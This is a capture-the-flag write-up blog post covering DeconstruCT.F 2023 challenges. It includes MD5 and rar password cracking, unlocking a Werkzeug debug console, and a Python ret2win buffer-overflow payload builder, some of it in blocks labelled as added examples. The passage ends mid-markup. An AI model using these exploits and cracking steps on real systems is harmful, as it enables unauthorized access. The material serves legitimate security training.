{"id":707,"date":"2023-08-04T22:50:35","date_gmt":"2023-08-04T20:50:35","guid":{"rendered":"https:\/\/babdcatha.net\/?p=707"},"modified":"2024-03-02T18:11:38","modified_gmt":"2024-03-02T17:11:38","slug":"deconstruct-f-2023","status":"publish","type":"post","link":"https:\/\/babdcatha.net\/index.php\/2023\/08\/04\/deconstruct-f-2023\/","title":{"rendered":"DeconstruCT.F 2023"},"content":{"rendered":"\n<p class=\"wp-block-paragraph\">Hi all, I participated this year in the <a href=\"https:\/\/deconstru.ctf.eng.run\">DeconstruCT.F<\/a> event, and I thought I would share my results with you.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Summary<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#GBP\">Avail Your Good Boy Points<\/a><\/li>\n\n\n\n<li><a href=\"#HashRoll\">Hash Roll<\/a><\/li>\n\n\n\n<li><a href=\"#Gibberish\">Gibberish<\/a><\/li>\n\n\n\n<li><a href=\"#debugzero\">debugzero<\/a><\/li>\n\n\n\n<li><a href=\"#ezpz\">Easy Peasy<\/a> (unsolved)<\/li>\n\n\n\n<li><a href=\"#missing\">Missing<\/a><\/li>\n\n\n\n<li><a href=\"#space\">Space Ahoy<\/a><\/li>\n\n\n\n<li><a href=\"#nothing\">sweet-nothing<\/a><\/li>\n\n\n\n<li><a href=\"#conclusion\">Conclusion<\/a><\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"GBP\">Avail Your Good Boy Points<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">When reading the rules all the way to the end, we find the first flag of this challenge:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-1\"><img loading=\"lazy\" decoding=\"async\" width=\"990\" height=\"598\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Goodboy_blur.png\" alt=\"\" class=\"wp-image-712\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Goodboy_blur.png 990w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Goodboy_blur-300x181.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Goodboy_blur-768x464.png 768w\" sizes=\"auto, (max-width: 990px) 100vw, 990px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">And that gives us our first 100 points of the game!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"HashRoll\">Hash Roll<\/h2>\n\n\n\n<p class=\"has-text-align-left wp-block-paragraph\">Here, we are given two files, a PDF and a ZIP file, with the following description: &#8220;Augustine&#8217;s friend took an important file of Augustine and stashed it. He was able to grab all the files from his friend&#8217;s machine but he is worried that the files are encrypted. Help him get the file back&#8221;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The ZIP file contains a single entry, <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">flag.jpg<\/mark>, but the archive is password-protected. When we open the PDF, this is what we get:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-2\"><img loading=\"lazy\" decoding=\"async\" width=\"1009\" height=\"706\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_pdf.png\" alt=\"\" class=\"wp-image-715\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_pdf.png 1009w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_pdf-300x210.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_pdf-768x537.png 768w\" sizes=\"auto, (max-width: 1009px) 100vw, 1009px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">It is easy to miss, but there is a very small line at the bottom of the page; zoomed in, this is what it says:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">29ebf2f279da44f69a35206885cd2dbc might be something you need<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Is this the password? No, we need to look harder. The string is 32 hexadecimal characters, exactly the size of an MD5 digest, so it is far more likely to be a hash of the password than the password itself. 
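<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Before reaching for an online lookup, the same reasoning can be done locally. The Python below is an added example and not code from the original write-up: it guesses the algorithm from the digest length and then hashes a wordlist with each candidate algorithm until one entry matches. The wordlist and the target digest (the MD5 of the word &#8220;password&#8221;) are constructed for the example; the hash from the PDF is only used to show the identification step.<\/p>

```python
import hashlib

# Hex digest length -> common unsalted algorithms of that length. Length alone
# cannot tell MD5 from other 128-bit digests, so every candidate gets tried.
BY_HEX_LENGTH = {
    32: ('md5',),
    40: ('sha1',),
    64: ('sha256',),
    128: ('sha512',),
}

# Constructed sample data for this example (not the challenge's real password).
WORDLIST = ['letmein', 'qwerty', 'password', 'dragon']
TARGET_MD5 = '5f4dcc3b5aa765d61d8327deb882cf99'   # md5('password')


def identify(digest: str) -> tuple:
    '''Candidate algorithm names for a hex string; () if it is not a hex digest at all.'''
    d = digest.strip().lower()
    if not d or any(c not in '0123456789abcdef' for c in d):
        return ()
    return BY_HEX_LENGTH.get(len(d), ())


def crack(digest: str, wordlist, algorithms=None):
    '''Hash each wordlist entry with each candidate algorithm until one matches.

    Returns (algorithm, password) or None. wordlist may be any iterable of
    strings, including an open file: trailing newlines are stripped.
    '''
    target = digest.strip().lower()
    words = [w.rstrip('\r\n') for w in wordlist]
    for algo in algorithms or identify(target):
        for word in words:
            if hashlib.new(algo, word.encode('utf-8')).hexdigest() == target:
                return algo, word
    return None


if __name__ == '__main__':
    print(identify('29ebf2f279da44f69a35206885cd2dbc'))   # the string from the PDF
    print(crack(TARGET_MD5, WORDLIST))
```

<p class=\"wp-block-paragraph\">To use a real wordlist, pass the open file object to crack() (open rockyou as latin-1, it is not valid UTF-8). This only works because the password was hashed once, unsalted, which is also the reason a public lookup table works in the next step.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">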
If we search for it in a public hash lookup database, we find:<\/p>\n\n\n\n<figure class=\"wp-block-image aligncenter size-full wp-duotone-unset-3\"><img loading=\"lazy\" decoding=\"async\" width=\"579\" height=\"186\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_md5_blur.png\" alt=\"\" class=\"wp-image-717\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_md5_blur.png 579w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_md5_blur-300x96.png 300w\" sizes=\"auto, (max-width: 579px) 100vw, 579px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Indeed, it was the MD5 hash of the password we were looking for. This only works because the password is a common word hashed once without a salt, so its digest is already in lookup tables; the offline equivalent is hashing a wordlist and comparing, which is what john does for the Missing challenge below. With the password, we can extract the archive and get our flag:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-4\"><img loading=\"lazy\" decoding=\"async\" width=\"1000\" height=\"1000\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_flag_blur.png\" alt=\"\" class=\"wp-image-718\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_flag_blur.png 1000w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_flag_blur-300x300.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_flag_blur-150x150.png 150w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/Hashroll_flag_blur-768x768.png 768w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Here we go, another 50 points for us.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"Gibberish\">Gibberish<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This challenge was probably not solved the intended way, but it doesn&#8217;t matter too much. 
For this challenge, we get a file called flag.txt, with what looks like a really long base64 string in it:<\/p>\n\n\n\n<div class=\"wp-block-file aligncenter\"><a id=\"wp-block-file--media-b87f9d32-ae76-4276-b2fd-0d89556b98b9\" href=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/flag.txt\">flag<\/a><a href=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/flag.txt\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-b87f9d32-ae76-4276-b2fd-0d89556b98b9\">Download<\/a><\/div>\n\n\n\n<p class=\"wp-block-paragraph\">Decoding it gives a binary whose first four bytes are 0x7f followed by &#8220;ELF&#8221;, the ELF magic, so this is a Linux executable. We could run it to see what it does, but running an unknown binary from a CTF on our own machine is not a great idea outside a sandbox, and looking at the printable strings in the file first costs nothing; it might even save us time if the flag is stored directly as a string. And, indeed, we find this in the binary:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">goodbye\ufffd\ufffd\ufffdmlh{REDACTED}\ufffdWrong pass<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This looks a lot like a flag, doesn&#8217;t it? The prefix is <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">mlh<\/mark> instead of the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">dsc<\/mark> prefix the event&#8217;s flags use; if we replace it and submit, the flag is accepted! And that&#8217;s 100 more points for us!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"debugzero\">debugzero<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">For this challenge, we are given a website, where the wrong version was deployed. 
Let&#8217;s take a look at the site:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-5\"><img loading=\"lazy\" decoding=\"async\" width=\"867\" height=\"110\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/website.png\" alt=\"\" class=\"wp-image-728\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/website.png 867w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/website-300x38.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/website-768x97.png 768w\" sizes=\"auto, (max-width: 867px) 100vw, 867px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Nothing too interesting here, so let&#8217;s take a look at the source of the page:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"markup\" class=\"language-markup\">&lt;!DOCTYPE html&gt;\n&lt;html lang=\"en\"&gt;\n  &lt;head&gt;\n    &lt;meta charset=\"UTF-8\" \/&gt;\n    &lt;meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge\" \/&gt;\n    &lt;meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\" \/&gt;\n    &lt;title&gt;Todo List&lt;\/title&gt;\n    &lt;!-- CSS only --&gt;\n    &lt;link\n      href=\"https:\/\/cdn.jsdelivr.net\/npm\/bootstrap@5.2.0-beta1\/dist\/css\/bootstrap.min.css\"\n      rel=\"stylesheet\"\n      integrity=\"sha384-0evHe\/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor\"\n      crossorigin=\"anonymous\"\n    \/&gt;\n    &lt;!-- JavaScript Bundle with Popper --&gt;\n    &lt;script\n      src=\"https:\/\/cdn.jsdelivr.net\/npm\/bootstrap@5.2.0-beta1\/dist\/js\/bootstrap.bundle.min.js\"\n      integrity=\"sha384-pprn3073KE6tl6bjs2QrFaJGz5\/SUsLqktiwsUTF55Jfv3qYSDhgCecCxMW52nD2\"\n      crossorigin=\"anonymous\"\n    &gt;&lt;\/script&gt;\n    &lt;link rel=\"stylesheet\" href=\"static\/styles.css\" \/&gt;\n  &lt;\/head&gt;\n  &lt;body&gt;\n    &lt;div class=\"container\"&gt;\n      &lt;h1&gt;This website is currently under &lt;i&gt;development&lt;\/i&gt;&lt;\/h1&gt;\n    
&lt;\/div&gt;\n  &lt;\/body&gt;\n\n  &lt;!-- John, please don't run the app in debug mode, how many times do I have to tell you this! --&gt;\n&lt;\/html&gt;<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Apparently, John ran this app in debug mode. Interesting: Werkzeug, the WSGI toolkit underneath Flask, serves its interactive debugger when the app runs in debug mode, and that debugger includes a Python console at <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">\/console<\/mark>. Searching a bit on the website, we find exactly that, which also tells us this is a Flask server:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-6\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"343\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_locked-1024x343.png\" alt=\"\" class=\"wp-image-732\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_locked-1024x343.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_locked-300x101.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_locked-768x257.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_locked.png 1355w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Hmmm, looking for a bit, I couldn&#8217;t find a working way to bypass this authentication popup. Time to try somewhere else. Looking back at the code, we find another interesting file: <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">\/static\/styles.css<\/mark>, which contains this:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">\/* Nothing interesting here except this number - XXXXXX *\/<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Okay, we got the PIN we were looking for. 
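<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Both hints in this challenge were sitting in developer comments, one in the HTML and one in the stylesheet, which is worth automating. The Python below is an added example and not part of the original write-up: it pulls HTML and C-style comments out of fetched sources, scores them for words like &#8220;debug&#8221; or &#8220;pin&#8221; and for runs of digits, and separately checks whether a response body is the Werkzeug debugger page. The two sample sources are constructed to mirror the pages above; the 123-456-789 in them is a placeholder (the real PIN is redacted in this write-up), and the &#8220;Werkzeug Debugger&#8221; marker is my assumption about the debugger template, to be checked against a real response.<\/p>

```python
import re

# The two comment syntaxes seen in this challenge: HTML comments in the markup
# and C-style block comments in the stylesheet (the same regex covers JavaScript).
HTML_COMMENT = re.compile(r'<!--(.*?)-->', re.S)
BLOCK_COMMENT = re.compile(r'/\*(.*?)\*/', re.S)

# Words that usually mean a developer comment is worth reading.
HINT_WORDS = ('debug', 'pin', 'password', 'secret', 'token', 'todo', 'fixme')

# Constructed sample sources, modelled on the challenge pages; the PIN is a placeholder.
SAMPLE_SOURCES = {
    '/': '''<!DOCTYPE html>
<html lang='en'>
  <head>
    <!-- CSS only -->
    <link rel='stylesheet' href='static/styles.css' />
  </head>
  <body><h1>This website is currently under <i>development</i></h1></body>
  <!-- John, please don't run the app in debug mode, how many times do I have to tell you this! -->
</html>''',
    '/static/styles.css': '/* Nothing interesting here except this number - 123-456-789 */\nbody { margin: 0; }',
}


def extract_comments(source: str) -> list:
    '''Every HTML and block comment in source, whitespace-stripped, empty ones dropped.'''
    found = HTML_COMMENT.findall(source) + BLOCK_COMMENT.findall(source)
    return [c.strip() for c in found if c.strip()]


def score_hint(comment: str) -> int:
    '''One point per hint word present, two more for a run of three or more digits.'''
    lower = comment.lower()
    score = sum(1 for w in HINT_WORDS if w in lower)
    if re.search(r'\d{3,}', comment):
        score += 2
    return score


def find_hints(sources: dict) -> list:
    '''Scan {path: body} and return (score, path, comment) tuples, best first.'''
    hits = []
    for path, body in sources.items():
        for comment in extract_comments(body):
            score = score_hint(comment)
            if score:
                hits.append((score, path, comment))
    return sorted(hits, reverse=True)


def is_werkzeug_debugger(body: str) -> bool:
    '''True if body looks like Werkzeug's debugger page (assumed marker, see lead-in).'''
    return 'Werkzeug Debugger' in body


if __name__ == '__main__':
    for score, path, comment in find_hints(SAMPLE_SOURCES):
        print(score, path, comment)
```

<p class=\"wp-block-paragraph\">Feed it every stylesheet and script the HTML references, not just the page itself, since the PIN here was in a file the page merely linked to. The scoring is a heuristic (the substring &#8220;pin&#8221; will also match words like &#8220;shipping&#8221;), so treat the output as a reading list, not a verdict. On the server side the real fix is never to deploy with debug enabled: the PIN slows an attacker down, but the console behind it is a Python shell.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">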
We now just have to unlock the debug console with it and read the flag (the console evaluates arbitrary Python as the user running the server, so reading one file is the least of what it allows), and that&#8217;s it:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-7\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"396\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_flag_blur-1024x396.png\" alt=\"\" class=\"wp-image-735\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_flag_blur-1024x396.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_flag_blur-300x116.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_flag_blur-768x297.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/console_flag_blur.png 1143w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Good, 500 more points for us!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"ezpz\">Easy Peasy<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">This challenge revolves around binary exploitation. We get a copy of the executable, which is running on a server that also holds the flag.<\/p>\n\n\n\n<p class=\"has-text-align-left wp-block-paragraph\">Running the app, it asks for a password which we do not have (and, in fact, does not exist). 
Looking for strings did not give us anything useful, so we take a look at the code using Ghidra:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"c\" class=\"language-c\">undefined8 main(void)\n\n{\n  puts(\"Please enter the super secret password to display the flag:\");\n  vuln();\n  puts(\"Invalid password, try again\\n\");\n  return 0;\n}\n\nvoid vuln(void)\n\n{\n  char pasword_input [32];\n  \n  gets(pasword_input);\n  return;\n}\n\nvoid win(void)\n\n{\n  char local_58 [72];\n  FILE *flag_file_pointer;\n  \n  flag_file_pointer = fopen(\"flag.txt\",\"r\");\n  if (flag_file_pointer == (FILE *)0x0) {\n    printf(\"%s %s\",\"Please create \\'flag.txt\\' in this directory with your\",\"own debugging flag.\\n\")\n    ;\n                    \/* WARNING: Subroutine does not return *\/\n    exit(0);\n  }\n  fgets(local_58,0x40,flag_file_pointer);\n  printf(local_58);\n  return;\n}<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Okay, basically, the main() function calls a function named <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">vuln()<\/mark>, in which the user inputs their password. The function then returns and the program ends there, no matter what the supplied password is. How are we supposed to get to the flag then? Well, there is also a win() function, which reads the flag and prints it, but nothing ever calls it. (It also hands the flag buffer to printf() as the format string, a format string bug in its own right, but we will not need that.) If we could execute this function, we could receive the flag, but how can we call it?<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The vuln() function reads the password with gets() into a 32-byte char array. gets() has no length limit at all, so anything longer than the buffer overwrites whatever sits above it on the stack, first the saved rbp and then the saved return address. This means we can probably try a buffer overflow here!<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Let&#8217;s run the program in <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">gdb<\/mark> and see if this works. 
To create the exploit input, I used this small Python script:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"python\" class=\"language-python\">import sys\n\n# 32 bytes fill the buffer, 8 overwrite the saved rbp, the rest lands on the saved rip\npadding = b'A' * 32\nrbp = b'ABCDEFGH'\nrip = b'4321'\n\n# write raw bytes so that a real address, with non-ASCII bytes, can be piped into the binary\nsys.stdout.buffer.write(padding + rbp + rip + b'\\n')<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">When we run the program and feed it this password, it crashes; looking at the registers, we get this:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-8\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"750\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_init.png\" alt=\"\" class=\"wp-image-742\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_init.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_init-300x234.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_init-768x600.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">See the rip register, which holds the address of the next instruction the CPU will execute? It contains 0x31323334, the bytes of the string 4321 read as a little-endian integer, which is why they appear reversed. This means we control where the program goes after vuln() returns! All we have to do is find the address of the win() function using gdb and put it in our script in place of 4321, as 8 little-endian bytes. 
This is the gdb command to do this:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">info address win<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And, when we try it:<\/p>\n\n\n\n<figure class=\"wp-block-image size-full wp-duotone-unset-9\"><img loading=\"lazy\" decoding=\"async\" width=\"960\" height=\"337\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_win_blur.png\" alt=\"\" class=\"wp-image-744\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_win_blur.png 960w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_win_blur-300x105.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/gdb_win_blur-768x270.png 768w\" sizes=\"auto, (max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Yay, it works! Let&#8217;s try it on the real server:<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Well, unfortunately, by that time, the binary running on the server had been changed, and I wasn&#8217;t aware of this \ud83d\ude05. An address read out of a local copy is only meaningful on the remote if the server runs that exact, non-PIE build, so when a working local exploit fails remotely it is worth re-downloading the challenge file and comparing checksums before blaming the payload. 
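<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Here is the payload construction above done more carefully, as an added Python example that is not part of the original write-up. Rather than assuming the 32 + 8 layout, it sends a cyclic (de Bruijn) pattern, takes the value that landed in the saved return address back from the crash and computes the offset from it; the address of win() is then packed as 8 little-endian bytes with struct.pack. The win() address 0x401196 used in the demonstration is a placeholder, not the challenge&#8217;s real one, and since the binary is not included the crash value is simulated from the pattern.<\/p>

```python
import itertools
import string
import struct
import sys

ALPHABET = string.ascii_lowercase.encode()


def _de_bruijn(alphabet: bytes, n: int):
    '''Yield the de Bruijn sequence B(k, n) over alphabet: every n-byte window is unique.'''
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length: int, n: int = 4) -> bytes:
    '''First `length` bytes of the pattern; any n-byte window occurs at most once.'''
    return bytes(itertools.islice(_de_bruijn(ALPHABET, n), length))


def cyclic_find(value, n: int = 4, max_len: int = 8192) -> int:
    '''Offset of a crash value inside the pattern, or -1.

    value is either the raw bytes read from the stack or the integer shown in
    a register; for an integer, its low n bytes in little-endian order are the
    first n pattern bytes that were written to that slot.
    '''
    if isinstance(value, int):
        value = value.to_bytes(8, 'little')
    return cyclic(max_len, n).find(value[:n])


def build_payload(win_addr: int, offset: int) -> bytes:
    '''offset filler bytes, then the 8-byte little-endian address of win().

    gets() stops at a newline, so a 0x0a byte anywhere in the payload would
    truncate it; NUL bytes are fine, gets() copies them.
    '''
    payload = b'A' * offset + struct.pack('<Q', win_addr)
    if b'\n' in payload:
        raise ValueError('payload contains a newline, gets() would cut it short')
    return payload


def simulated_crash(pattern: bytes, ret_offset: int = 40) -> int:
    '''Stand-in for the binary: the 8 pattern bytes that would overwrite the saved rip.'''
    return struct.unpack_from('<Q', pattern, ret_offset)[0]


if __name__ == '__main__':
    # Stage 1: python3 exploit.py pattern | ./easy_peasy   (then read rip, or rsp, in gdb)
    # Stage 2: python3 exploit.py 0x401196 40 | nc host port
    if sys.argv[1:2] == ['pattern']:
        sys.stdout.buffer.write(cyclic(200) + b'\n')
    else:
        addr, offset = int(sys.argv[1], 16), int(sys.argv[2])
        sys.stdout.buffer.write(build_payload(addr, offset) + b'\n')
```

<p class=\"wp-block-paragraph\">Two gdb details matter with this approach. On x86-64 a return address that is not canonical (eight pattern bytes are not) faults on the ret instruction itself, so rip still points at the ret; the value to feed cyclic_find() is then the 8 bytes at rsp. And if win() crashes inside fopen() or printf() once the redirect works, the stack is misaligned by 8 bytes because win() was entered by a ret rather than a call: putting the address of a lone ret instruction in front of the address of win() restores 16-byte alignment.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">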
Oh, well, at least it worked on my machine \ud83d\ude42.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"missing\">Missing<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">We are given a .rar file, and we can crack its password with john:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code lang=\"bash\" class=\"language-bash\">rar2john jason.rar &gt; jason.txt\njohn --wordlist=\/usr\/share\/wordlists\/rockyou.txt jason.txt<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">This gives us the password. Inside the archive, we find two GitHub repositories.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">We can see a few traps, but one thing looks promising in the <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">empty.txt<\/mark> file:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">find my github pages site that i accidentaly deleted to find what u want :P<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Since this is a Git repository, deleting a file does not remove it from the commit history, so we can look back in time to see what the site was:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">aHR0cHM6Ly93d3cuaW5zdGFncmFtLmNvbS90b2RkX2phc29uX3NlY3VyZS8=<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">Which, decoded, is:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">https:\/\/www.instagram.com\/todd_jason_secure\/<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">After creating an Instagram account ( :'( ), we find this:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-10\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"749\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram-1024x749.png\" alt=\"\" class=\"wp-image-753\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram-1024x749.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram-300x219.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram-768x562.png 
768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram.png 1270w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">We need to find his Twitter account for the next step, and a weird string. After creating a Twitter account ( :'( ), we find him:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">https:\/\/twitter.com\/toddjasonsecure<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">And a bunch of base64 \/ base32 encoded strings:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"\">ZHNje24wX0YhQEdfSGVSZV86cF9tQDdFfQ==\nG5UF6TZVJFH(REDACTED)==<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\">The first one is base64 (mixed-case letters, digits and = padding) and decodes to &#8220;<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-primary-color\">dsc{n0_F!@G_HeRe_:p_m@7E}<\/mark>&#8221;, so it&#8217;s probably not too important. The second is base32 (only upper-case letters and the digits 2 to 7) and, once decoded, gives us the last part of the real flag. We are progressing!<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Looking back at the Instagram account, we find the first part of the flag in the second image on the account:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large wp-duotone-unset-11\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"489\" src=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag-1024x489.png\" alt=\"\" class=\"wp-image-760\" srcset=\"https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag-1024x489.png 1024w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag-300x143.png 300w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag-768x367.png 768w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag-1536x734.png 1536w, https:\/\/babdcatha.net\/wp-content\/uploads\/2023\/08\/instagram_flag.png 1553w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p 
